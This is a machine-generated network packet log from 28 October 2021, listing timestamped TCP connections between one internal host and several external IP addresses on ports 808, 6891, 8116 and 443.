Oct 28, 2021 05:28:01.278814077 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:01.278902054 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.279872894 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.290189981 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.290592909 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.437879086 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:01.448323965 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:01.448510885 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:01.448527098 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:01.448575020 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:01.843732119 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:01.843750954 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:01.843812943 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.843857050 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.851841927 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.871520996 CEST	443	50018	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:01.871589899 CEST	443	50018	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:01.871685982 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:01.871704102 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:01.875566006 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:01.875595093 CEST	443	50018	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:01.974040985 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.009893894 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.041260004 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.140069962 CEST	6891	50025	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:02.140185118 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.142422915 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.200865030 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.200997114 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.201996088 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.309052944 CEST	6891	50025	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:02.309122086 CEST	6891	50025	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:02.309200048 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.309921026 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.314198017 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.314340115 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.361490965 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.361572981 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.361690998 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.362231016 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.365854025 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.365947962 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.480184078 CEST	6891	50025	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:02.480345964 CEST	6891	50025	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:02.521933079 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.527539015 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.527558088 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.527568102 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.860219002 CEST	6891	50025	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:02.860245943 CEST	6891	50025	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:02.860411882 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.860455990 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.867904902 CEST	50025	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:02.913080931 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.913101912 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:02.913201094 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.913252115 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.918430090 CEST	50026	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:02.992522955 CEST	50030	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:03.033720016 CEST	6891	50025	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:03.039516926 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.047418118 CEST	8116	50030	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:03.047535896 CEST	50030	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:03.048188925 CEST	50030	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:03.079303026 CEST	808	50026	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:03.100018978 CEST	8116	50030	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:03.100146055 CEST	8116	50030	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:03.100241899 CEST	50030	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:03.100866079 CEST	50030	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:03.104803085 CEST	50030	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:03.104923010 CEST	50030	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:03.156529903 CEST	8116	50030	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:03.156548977 CEST	8116	50030	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:03.205638885 CEST	6891	50031	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:03.206168890 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.207062960 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.326164961 CEST	8116	50030	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:03.326196909 CEST	8116	50030	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:03.326309919 CEST	50030	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:03.335211039 CEST	50030	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:03.372828960 CEST	6891	50031	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:03.373081923 CEST	6891	50031	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:03.373219967 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.374358892 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.380052090 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.380218983 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.386997938 CEST	8116	50030	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:03.456486940 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:03.456538916 CEST	443	50032	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:03.456702948 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:03.457449913 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:03.457464933 CEST	443	50032	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:03.545991898 CEST	6891	50031	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:03.546011925 CEST	6891	50031	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:03.546020031 CEST	6891	50031	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:03.927980900 CEST	6891	50031	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:03.928005934 CEST	6891	50031	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:03.928164959 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.928201914 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.931395054 CEST	50031	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:03.979599953 CEST	443	50032	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:03.979799986 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:03.980603933 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:03.980621099 CEST	443	50032	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:03.985765934 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:03.985800982 CEST	443	50032	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:03.985925913 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:03.985939980 CEST	443	50032	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:04.049257994 CEST	50033	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:04.097213984 CEST	6891	50031	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:04.097554922 CEST	8116	50033	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:04.097686052 CEST	50033	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:04.098242998 CEST	50033	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:04.146610022 CEST	8116	50033	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:04.146800041 CEST	8116	50033	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:04.146894932 CEST	50033	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:04.147485018 CEST	50033	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:04.151196003 CEST	50033	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:04.151302099 CEST	50033	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:04.199249983 CEST	8116	50033	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:04.393301964 CEST	8116	50033	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:04.393325090 CEST	8116	50033	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:04.393399000 CEST	50033	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:04.396337986 CEST	50033	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:04.444607973 CEST	8116	50033	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:04.524609089 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:04.524657965 CEST	443	50034	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:04.524754047 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:04.525427103 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:04.525444984 CEST	443	50034	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:04.694247007 CEST	443	50032	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:04.694344044 CEST	443	50032	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:04.694374084 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:04.694426060 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:04.703531981 CEST	50032	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:04.703558922 CEST	443	50032	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:04.816092968 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:04.981161118 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:04.981266975 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:04.981906891 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:05.058393002 CEST	443	50034	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:05.058521986 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:05.059159040 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:05.059175014 CEST	443	50034	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:05.065196037 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:05.065217018 CEST	443	50034	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:05.065371037 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:05.065382957 CEST	443	50034	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:05.148447990 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.148478031 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.148562908 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:05.149126053 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:05.153194904 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:05.153318882 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:05.315869093 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.319638014 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.319654942 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.324939966 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.324965954 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.324981928 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.704782009 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.704804897 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.704972982 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:05.705037117 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:05.712430954 CEST	50035	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:05.783426046 CEST	443	50034	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:05.783533096 CEST	443	50034	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:05.783605099 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:05.783648014 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:05.786932945 CEST	50034	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:05.786958933 CEST	443	50034	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:05.835254908 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:05.875361919 CEST	808	50035	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:05.922070980 CEST	50037	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:06.001363993 CEST	6891	50036	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:06.001512051 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.002274036 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.080215931 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.080384016 CEST	50037	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:06.081073999 CEST	50037	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:06.168214083 CEST	6891	50036	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:06.168311119 CEST	6891	50036	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:06.168405056 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.169245005 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.187151909 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.187402964 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.239069939 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.239192009 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.240416050 CEST	50037	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:06.241275072 CEST	50037	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:06.247927904 CEST	50037	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:06.248048067 CEST	50037	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:06.353480101 CEST	6891	50036	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:06.391302109 CEST	6891	50036	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:06.399293900 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.406153917 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.406160116 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.406172991 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.406182051 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.406205893 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.737555981 CEST	6891	50036	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:06.737576962 CEST	6891	50036	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:06.737761974 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.737869024 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.747077942 CEST	50036	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.797609091 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.797646046 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.797749996 CEST	50037	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:06.800041914 CEST	50037	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:06.865377903 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:06.913170099 CEST	6891	50036	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:06.916366100 CEST	8116	50038	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:06.916567087 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:06.917285919 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:06.925403118 CEST	50039	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:06.958334923 CEST	808	50037	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:06.967911005 CEST	8116	50038	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:06.968169928 CEST	8116	50038	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:06.968245029 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:06.968828917 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:06.972876072 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:06.972984076 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:07.023631096 CEST	8116	50038	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:07.023669004 CEST	8116	50038	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:07.091356993 CEST	6891	50039	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:07.091470957 CEST	50039	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:07.092078924 CEST	50039	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:07.193557024 CEST	8116	50038	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:07.193578959 CEST	8116	50038	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:07.193651915 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:07.193676949 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:07.198951006 CEST	50038	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:07.251441956 CEST	8116	50038	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:07.257972002 CEST	6891	50039	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:07.258084059 CEST	6891	50039	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:07.258217096 CEST	50039	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:07.259021044 CEST	50039	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:07.264867067 CEST	50039	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:07.265060902 CEST	50039	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:07.314624071 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:07.314692020 CEST	443	50040	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:07.314796925 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:07.315279007 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:07.315300941 CEST	443	50040	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:07.430824995 CEST	6891	50039	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:07.430943012 CEST	6891	50039	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:07.467139959 CEST	6891	50039	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:07.810677052 CEST	443	50040	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:07.810764074 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:07.811903954 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:07.811919928 CEST	443	50040	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:07.815471888 CEST	6891	50039	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:07.815495968 CEST	6891	50039	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:07.815604925 CEST	50039	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:07.816261053 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:07.816272974 CEST	443	50040	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:07.816385984 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:07.816395998 CEST	443	50040	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:07.818818092 CEST	50039	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:07.945322037 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:07.984699965 CEST	6891	50039	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:07.999334097 CEST	8116	50041	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:07.999516010 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:08.000581980 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:08.054603100 CEST	8116	50041	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:08.054877043 CEST	8116	50041	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:08.055031061 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:08.055469990 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:08.058237076 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:08.058280945 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:08.113349915 CEST	8116	50041	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:08.113378048 CEST	8116	50041	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:08.113394022 CEST	8116	50041	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:08.282089949 CEST	8116	50041	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:08.282141924 CEST	8116	50041	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:08.282288074 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:08.282471895 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:08.284749031 CEST	50041	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:08.338634014 CEST	8116	50041	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:08.424182892 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.424232960 CEST	443	50042	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:08.424313068 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.424835920 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.424863100 CEST	443	50042	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:08.505686045 CEST	443	50040	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:08.505775928 CEST	443	50040	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:08.505966902 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.505983114 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.514163971 CEST	50040	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.514199018 CEST	443	50040	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:08.629688978 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:08.797939062 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:08.798091888 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:08.798671961 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:08.916704893 CEST	443	50042	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:08.916853905 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.917814970 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.917834997 CEST	443	50042	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:08.926837921 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.926857948 CEST	443	50042	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:08.927040100 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:08.927054882 CEST	443	50042	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:08.966510057 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:08.966537952 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:08.966653109 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:08.967190981 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:08.971523046 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:08.971618891 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:09.134645939 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:09.139192104 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:09.139225960 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:09.139240026 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:09.139254093 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:09.525763035 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:09.525821924 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:09.526016951 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:09.526040077 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:09.533896923 CEST	50043	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:09.610991955 CEST	443	50042	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:09.611080885 CEST	443	50042	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:09.611094952 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:09.611135960 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:09.614423037 CEST	50042	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:09.614459991 CEST	443	50042	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:09.644320011 CEST	50044	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:09.701457977 CEST	808	50043	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:09.738117933 CEST	50045	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:09.810650110 CEST	6891	50044	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:09.810872078 CEST	50044	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:09.811796904 CEST	50044	6891	192.168.2.3	45.77.0.96
